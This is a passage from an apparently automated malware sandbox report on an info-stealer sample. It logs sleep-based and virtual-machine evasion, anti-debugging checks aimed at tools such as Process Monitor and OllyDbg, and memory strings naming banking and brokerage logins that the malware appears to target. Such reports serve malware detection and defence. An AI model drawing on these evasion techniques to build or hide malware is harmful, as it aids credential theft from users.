                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1788Thread sleep time: -50025s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2820Thread sleep count: 1033 > 30
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2820Thread sleep time: -2067033s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7056Thread sleep count: 968 > 30
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7056Thread sleep time: -1936968s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1292Thread sleep count: 1066 > 30
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1292Thread sleep time: -2133066s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 904Thread sleep count: 254 > 30
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 904Thread sleep time: -7620000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6472Thread sleep time: -360000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784Thread sleep count: 1151 > 30
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784Thread sleep time: -2303151s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 3292Thread sleep count: 1033 > 30
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 3292Thread sleep time: -2067033s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1880Thread sleep count: 1081 > 30
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1880Thread sleep time: -2163081s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1576Thread sleep count: 1070 > 30
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1576Thread sleep time: -2141070s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784Thread sleep count: 895 > 30
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784Thread sleep time: -1790895s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -6456360425798339s >= -30000s
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3752Thread sleep count: 9379 > 30
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3752Thread sleep time: -9379000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 5548Thread sleep time: -30000s >= -30000s
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2888Thread sleep count: 130 > 30
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2636Thread sleep count: 129 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 1276Thread sleep count: 1231 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 1276Thread sleep count: 450 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe TID: 7992Thread sleep count: 61 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 7812Thread sleep count: 1415 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 7812Thread sleep count: 57 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8088Thread sleep count: 57 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8088Thread sleep time: -114057s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8096Thread sleep count: 72 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8096Thread sleep time: -144072s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8080Thread sleep count: 61 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8080Thread sleep time: -122061s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8056Thread sleep count: 303 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8056Thread sleep time: -9090000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7868Thread sleep time: -360000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8076Thread sleep count: 8437 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8076Thread sleep time: -16882437s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe TID: 2676Thread sleep time: -23058430092136925s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe TID: 6624Thread sleep time: -23980767295822402s >= -30000s
                              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeLast function: Thread delayed
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeThread sleep count: Count: 1149 delay: -10
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeThread sleep count: Count: 1231 delay: -10
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeThread sleep count: Count: 1415 delay: -10
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread delayed: delay time: 30000
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread delayed: delay time: 30000
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.ini
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.ini
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.ini
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000002.3260757823.0000000007A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}metameta
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmp, c884f8452a.exe, 00000014.00000002.3269980553.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244453808.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252347370.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145407488.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000002.3204809220.000000000063E000.00000040.00000001.01000000.00000017.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}u.gn,v.gn,w.gn,x.gn,y.gn,z.gn,a.hk,b.hk,c.hk,d.hk,e.hk,f.hk,g.hk,h.hk,i.hk,j.hk,k.hk,l.hk,m.hk,n.hk,o.hk,p
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: billing_address_id.comVMware20,11696428
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .utiitsl.comVMware20,1169642865
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}<
                              Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AF41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: MPGPH131.exe, 0000001D.00000003.2969808776.0000000001284000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169642865
                              Source: c884f8452a.exe, 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}-
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: c884f8452a.exe, 00000014.00000003.2980525075.0000000008111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428(
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ta\*
                              Source: MPGPH131.exe, 0000001C.00000003.2969098995.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}p.
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nickname.utiitsl.comVMware20,1169642865
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: c884f8452a.exe, 00000024.00000003.3078423333.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra Change Transaction PasswordVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o.inVMware20,11696428655~
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: c884f8452a.exe, 00000014.00000003.2910333691.0000000001691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Cry
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
                              Source: c884f8452a.exe, 00000014.00000003.2910333691.0000000001691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{`p
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: c884f8452a.exe, 00000014.00000003.2980525075.0000000008111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169642865
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}x
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg>_I
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comVMware20,11696428655o
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: netsh.exe, 00000009.00000002.2741856372.000001F406E37000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.2741173735.000001F406E34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: MPGPH131.exe, 0000001D.00000002.3253650821.000000000126D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(<+
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000002.3254763388.0000000001304000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9A5A6814
                              Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9A5A6814ZokPL[g
                              Source: c884f8452a.exe, 00000024.00000002.3143187486.0000000000568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSystem information queried: ModuleInformation
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess information queried: ProcessInformation

                              Anti Debugging

                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeSystem information queried: CodeIntegrityInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeSystem information queried: CodeIntegrityInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeSystem information queried: CodeIntegrityInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeSystem information queried: CodeIntegrityInformation
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeThread information set: HideFromDebugger
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebugger
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_051F0A3C Start: 051F0B37 End: 051F0AAB0_2_051F0A3C
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeOpen window title or class name: gbdyllo
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: procmon_window_class
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: NTICE
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: SICE
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: SIWVID
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess queried: DebugPort
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess queried: DebugPort
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_051F0CAD rdtsc 0_2_051F0CAD
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00BB7BBB mov eax, dword ptr fs:[00000030h]0_2_00BB7BBB
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00BBB922 mov eax, dword ptr fs:[00000030h]0_2_00BBB922
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0073B922 mov eax, dword ptr fs:[00000030h]2_2_0073B922
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00737BBB mov eax, dword ptr fs:[00000030h]2_2_00737BBB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_0073B922 mov eax, dword ptr fs:[00000030h]3_2_0073B922
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00737BBB mov eax, dword ptr fs:[00000030h]3_2_00737BBB
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_00395E8B mov eax, dword ptr fs:[00000030h]14_2_00395E8B
